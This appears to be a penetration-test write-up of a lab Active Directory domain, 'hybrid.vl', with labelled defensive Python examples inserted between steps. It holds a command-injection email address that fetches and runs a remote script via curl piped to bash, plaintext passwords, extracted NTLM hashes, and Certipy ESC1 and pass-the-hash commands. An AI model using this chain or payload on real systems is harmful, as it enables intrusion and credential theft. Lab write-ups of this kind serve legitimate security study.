Detailed Findings and Recommendations

The scope of this penetration test is to identify and exploit vulnerabilities on the following set of IP addresses and to report the results.

ID          IP             Name
Machine 1   10.10.201.37   DC01.hybrid.vl
Machine 2   10.10.201.38   mail01.hybrid.vl

Enumeration

Nmap

The initial scan of machine 1 shows the following open ports:

sudo nmap -sC -sV -oA machine_1 10.10.201.37
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-07 11:15:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active 
Subject: commonName=dc01.hybrid.vl
DNS:dc01.hybrid.vl
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active 
3268/tcp open  ldap          Microsoft Windows Active 
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP
| rdp-ntlm-info: 
|   Target_Name: HYBRID
|   NetBIOS_Domain_Name: HYBRID
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hybrid.vl
|   DNS_Computer_Name: dc01.hybrid.vl
|   Product_Version: 10.0.20348

The scan of machine 2 shows the following open ports:

Nmap scan report for 10.10.201.38
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp   open  http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Redirecting...
110/tcp  open  pop3     Dovecot pop3d
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
|_pop3-capabilities: SASL UIDL STLS AUTH-RESP-CODE TOP RESP-CODES CAPA PIPELINING
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37190/udp   mountd
|   100005  1,2,3      38717/udp6  mountd
|   100005  1,2,3      40645/tcp6  mountd
|   100005  1,2,3      56357/tcp   mountd
|   100021  1,3,4      34005/tcp   nlockmgr
|   100021  1,3,4      34426/udp6  nlockmgr
|   100021  1,3,4      34753/tcp6  nlockmgr
|   100021  1,3,4      40896/udp   nlockmgr
|   100024  1          34054/udp6  status
|   100024  1          46197/udp   status
|   100024  1          48587/tcp6  status
|   100024  1          51705/tcp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
143/tcp  open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: ID STARTTLS listed have more IDLE ENABLE post-login LOGIN-REFERRALS OK Pre-login SASL-IR LOGINDISABLEDA0001 LITERAL+ capabilities IMAP4rev1
587/tcp  open  smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: ID OK listed have more IDLE ENABLE post-login LOGIN-REFERRALS capabilities Pre-login AUTH=PLAIN IMAP4rev1 LITERAL+ AUTH=LOGINA0001 SASL-IR
995/tcp  open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) UIDL RESP-CODES AUTH-RESP-CODE TOP USER CAPA PIPELINING
2049/tcp open  nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The NFS export on machine 2 is listed and mounted locally:

showmount -e 10.10.201.38
sudo mount -t nfs -o vers=2,nolock 10.10.201.38:/opt/share ./shared

Loot

admin@hybrid.vl:{plain}Duckling21
peter.turner@hybrid.vl:{plain}PeterIstToll!

peter.turner&curl${IFS}10.8.2.41/bad${IFS}|${IFS}bash&@hybrid.vl
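The address on the line above carries shell metacharacters in its local part, which is what turns a profile update into command execution when the mail stack hands the address to a shell. As an added example that is not part of these notes, the check a mail-facing application should apply: a conservative allowlist for the local part, an allowlist of served domains, and a shell-free argument vector for any hook that receives the address. The hook path, the allowed-domain set and the sample addresses are assumptions constructed for this example.

```python
import re
import subprocess

# Conservative allowlist, deliberately stricter than RFC 5321 atext: letters,
# digits, dot, underscore, plus and hyphen.  RFC 5321 itself permits characters
# such as & $ { } | ` in a local part, which is exactly why "syntactically valid
# email address" must never be mistaken for "safe to hand to a shell".
SAFE_LOCAL_PART = re.compile(r"^[A-Za-z0-9_+-]+(?:\.[A-Za-z0-9_+-]+)*$")
SAFE_DOMAIN = re.compile(r"^[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")

# Constructed: the only domain this mail server is allowed to accept addresses for.
ALLOWED_DOMAINS = {"hybrid.vl"}

# Assumption for this example: the post-change hook the application invokes.
HOOK_PATH = "/usr/local/bin/mail-hook"


def split_address(address: str) -> tuple[str, str]:
    """Split on the last '@' and validate both halves.

    Raises ValueError for anything outside the allowlists, so a rejected
    address never reaches the hook at all.
    """
    local, sep, domain = address.rpartition("@")
    if not sep or not SAFE_LOCAL_PART.fullmatch(local):
        raise ValueError(f"rejected local part in {address!r}")
    if not SAFE_DOMAIN.fullmatch(domain) or domain.lower() not in ALLOWED_DOMAINS:
        raise ValueError(f"rejected domain in {address!r}")
    return local, domain.lower()


def build_hook_argv(address: str) -> list[str]:
    """Build the argument vector for the hook.

    The address is one argv element; combined with shell=False below, no
    character in it is ever interpreted by a shell, so validation is a second
    layer rather than the only one.
    """
    local, domain = split_address(address)
    return [HOOK_PATH, "--address", f"{local}@{domain}"]


def run_hook(address: str) -> subprocess.CompletedProcess:
    """Invoke the hook without a shell (HOOK_PATH is assumed to exist)."""
    return subprocess.run(build_hook_argv(address), shell=False,
                          check=False, capture_output=True)


def unsafe_shell_command(address: str) -> str:
    """The pattern to avoid: string-building a command line for a shell.

    Returned only for comparison; an address with & | ; $() in its local part
    becomes part of the command when a string like this reaches sh -c.
    """
    return f"{HOOK_PATH} --address {address}"
```

The allowlist rejects the injected address from the notes outright, and the argv form means that even an address which slips past validation cannot change what gets executed.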

nfs_share

  • Download passwords.kdbx from the NFS share.
  • Peter's password is reused for the KeePass database: open passwords.kdbx in keepass2 with it.
  • Password obtained from the database:
b0cwR+G4Dzl_rw
ssh 'peter.turner@hybrid.vl'@10.10.201.38
sudo -l
sudo su
cd /root
cat flag.txt
VL{732f10b1eb439d9291c2b88c3fed66fe}
Download krb5.keytab from machine 2 and extract the machine account keys with keytabextract.py:
./keytabextract.py /home/jay/krb5.keytab
RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
	REALM : HYBRID.VL
	SERVICE PRINCIPAL : MAIL01$/
	NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
	AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
	AES-128 HASH : 3a732454c95bcef529167b6bea476458
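The extractor output above shows that the keytab still holds an RC4-HMAC key alongside the AES keys; that RC4 key is what is reused as an NTLM hash in the next step. An audit of keytabs on domain-joined hosts therefore wants to list principal, kvno and enctype per entry without ever handling the key bytes. The following is an added example, not from these notes or from keytabextract: an MIT keytab (format version 0x0502) parser plus a weak-enctype audit. The sample keytab is constructed inline with dummy key material; the principal name follows the one in the output above.

```python
import struct

# Kerberos enctype numbers (RFC 3961, RFC 4757, RFC 8009).
ENCTYPE_NAMES = {
    1: "des-cbc-crc", 3: "des-cbc-md5", 16: "des3-cbc-sha1",
    17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
    19: "aes128-cts-hmac-sha256-128", 20: "aes256-cts-hmac-sha384-192",
    23: "rc4-hmac", 24: "rc4-hmac-exp",
}
# DES and RC4 families: an RC4 key is the NT hash and DES is broken outright.
WEAK_ENCTYPES = {1, 3, 16, 23, 24}


def _counted(buf: bytes, off: int) -> tuple[bytes, int]:
    """Read a 16-bit big-endian length followed by that many bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    return buf[off:off + n], off + n


def parse_keytab(data: bytes) -> list[dict]:
    """Parse an MIT keytab into audit records.

    Key bytes are deliberately not returned: the audit needs principal,
    kvno, enctype and key length, not the secret itself.
    """
    if data[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version")
    off, entries = 2, []
    while off < len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size < 0:                      # negative size marks a deleted entry
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm, off = _counted(data, off)
        comps = []
        for _ in range(ncomp):
            c, off = _counted(data, off)
            comps.append(c.decode())
        name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, off)
        off += 9
        (etype,) = struct.unpack_from(">H", data, off)
        off += 2
        key, off = _counted(data, off)
        vno = vno8
        if end - off >= 4:                # optional 32-bit kvno trails the key
            (vno32,) = struct.unpack_from(">I", data, off)
            if vno32:
                vno = vno32
        entries.append({
            "principal": "/".join(comps) + "@" + realm.decode(),
            "kvno": vno, "enctype": etype, "key_len": len(key),
            "timestamp": timestamp,
        })
        off = end
    return entries


def build_keytab(entries: list[tuple[str, int, int, bytes]]) -> bytes:
    """Serialise (principal, kvno, enctype, key) tuples; used here only to
    construct the sample below."""
    out = bytearray(b"\x05\x02")
    for principal, kvno, etype, key in entries:
        name, realm = principal.rsplit("@", 1)
        comps = name.split("/")
        body = bytearray(struct.pack(">H", len(comps)))
        body += struct.pack(">H", len(realm)) + realm.encode()
        for c in comps:
            body += struct.pack(">H", len(c)) + c.encode()
        body += struct.pack(">IIB", 1, 0, kvno & 0xFF)   # name type, timestamp, vno8
        body += struct.pack(">H", etype)
        body += struct.pack(">H", len(key)) + key
        body += struct.pack(">I", kvno)                  # 32-bit kvno
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


def audit_keytab(data: bytes) -> list[str]:
    """One finding per entry whose enctype is in WEAK_ENCTYPES."""
    findings = []
    for e in parse_keytab(data):
        if e["enctype"] in WEAK_ENCTYPES:
            name = ENCTYPE_NAMES.get(e["enctype"], str(e["enctype"]))
            findings.append(f"{e['principal']} kvno {e['kvno']}: weak enctype {name}")
    return findings


# Constructed sample: dummy key bytes, not real keys.
SAMPLE_KEYTAB = build_keytab([
    ("MAIL01$@HYBRID.VL", 3, 23, bytes(range(16))),
    ("MAIL01$@HYBRID.VL", 3, 18, bytes(range(32))),
    ("MAIL01$@HYBRID.VL", 3, 17, bytes(range(16))),
])
```

Run against the sample, the audit reports exactly one finding, the rc4-hmac entry; the remediation is to disable RC4 for the machine account (msDS-SupportedEncryptionTypes restricted to AES) and reissue the keytab so the RC4 key is no longer stored on the host.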
certipy find -vulnerable -u 'peter.turner'@hybrid.vl -p b0cwR+G4Dzl_rw -dc-ip 10.10.201.37
  • ESC1 on the HybridComputers template, which is enrollable by domain computers.
certipy req -u 'Mail01$'@hybrid.vl -ca 'hybrid-DC01-CA' -template HybridComputers -hashes 0f916c5246fdbc7ba95dcef4126d57bd -upn 'administrator@hybrid.vl' -dns 'dc01.hybrid.vl' -key-size 4096 -debug
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.201.37
Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:60701e8543c9f6db1a2af3217386d3dc

cme smb 10.10.201.37 -u 'administrator' -H 60701e8543c9f6db1a2af3217386d3dc --shares
evil-winrm -i 10.10.201.37 -u Administrator -H 60701e8543c9f6db1a2af3217386d3dc
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
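The chain above depends on one template satisfying every ESC1 precondition at once: the enrollee supplies the subject, no manager approval, no authorized signatures, an authentication-capable EKU, and enrollment rights for a low-privileged group (here domain computers). As an added example that is not part of these notes or of Certipy, the following evaluates those conditions on a template record and shows which settings break the chain. The template name is the one from the finding; its flag values, EKU list and enrollment rights are constructed assumptions, and the flag constants are the documented msPKI values.

```python
from dataclasses import dataclass

# Bits in the msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag attributes.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval

# EKU OIDs that let a certificate authenticate a principal to AD.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}
LOW_PRIV_GROUPS = {"Domain Computers", "Domain Users", "Authenticated Users", "Everyone"}


@dataclass
class Template:
    name: str
    name_flag: int            # msPKI-Certificate-Name-Flag
    enrollment_flag: int      # msPKI-Enrollment-Flag
    ra_signatures: int        # msPKI-RA-Signature (authorized signatures required)
    ekus: list[str]           # pKIExtendedKeyUsage OIDs; empty means all purposes
    enrollers: set[str]       # groups holding the Certificate-Enrollment right
    enabled: bool = True      # published on an enterprise CA


def esc1_conditions(t: Template) -> list[str]:
    """Return the ESC1 preconditions the template satisfies (all five = ESC1)."""
    met = []
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject (SAN/UPN chosen by the requester)")
    if not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS):
        met.append("no manager approval")
    if t.ra_signatures == 0:
        met.append("no authorized signatures required")
    auth = [AUTH_EKUS[o] for o in t.ekus if o in AUTH_EKUS]
    if auth or not t.ekus:
        met.append("authentication EKU: " + (", ".join(auth) or "none listed (any purpose)"))
    low = sorted(t.enrollers & LOW_PRIV_GROUPS)
    if low:
        met.append("enrollable by low-privileged group(s): " + ", ".join(low))
    return met


def is_esc1(t: Template) -> bool:
    return t.enabled and len(esc1_conditions(t)) == 5


def harden(t: Template) -> Template:
    """Copy of the template with the three controls that each break ESC1:
    the CA builds the subject from AD, requests need manager approval, and
    low-privileged groups lose the enrollment right."""
    return Template(
        name=t.name,
        name_flag=t.name_flag & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        enrollment_flag=t.enrollment_flag | CT_FLAG_PEND_ALL_REQUESTS,
        ra_signatures=t.ra_signatures,
        ekus=list(t.ekus),
        enrollers=t.enrollers - LOW_PRIV_GROUPS,
        enabled=t.enabled,
    )


# Constructed record modelled on the finding; values are assumptions.
HYBRID_COMPUTERS = Template(
    name="HybridComputers",
    name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    enrollment_flag=0,
    ra_signatures=0,
    ekus=["1.3.6.1.5.5.7.3.2"],
    enrollers={"Domain Computers", "Domain Admins"},
)
```

Any one of the three changes in harden() is enough on its own; clearing ENROLLEE_SUPPLIES_SUBJECT is the one that removes the root cause, since a requester can then no longer put another account's UPN into the certificate.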


Additional Items

Appendix - AMSI Bypass code

Appendix - Powershell Shellcoderunner

Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code

Appendix - Risk Assessment Matrix

Appendix - Proof and Local Contents

Hostname   local.txt Contents   proof.txt Contents
HOSTNAME   foobar
HOSTNAME   foobar

Appendix - Credentials obtained

NTLM Hashes

Username        NTLM Hash   Found in
Administrator   HASH        HOSTNAME

Passwords

Found in   Corresponds to   Password
HOSTNAME   USER BELONGS     Password123*

Credential files

Found in   File                    Type
HOSTNAME   FILE FROM WHERE IS IT   Example: SSH Priv. Key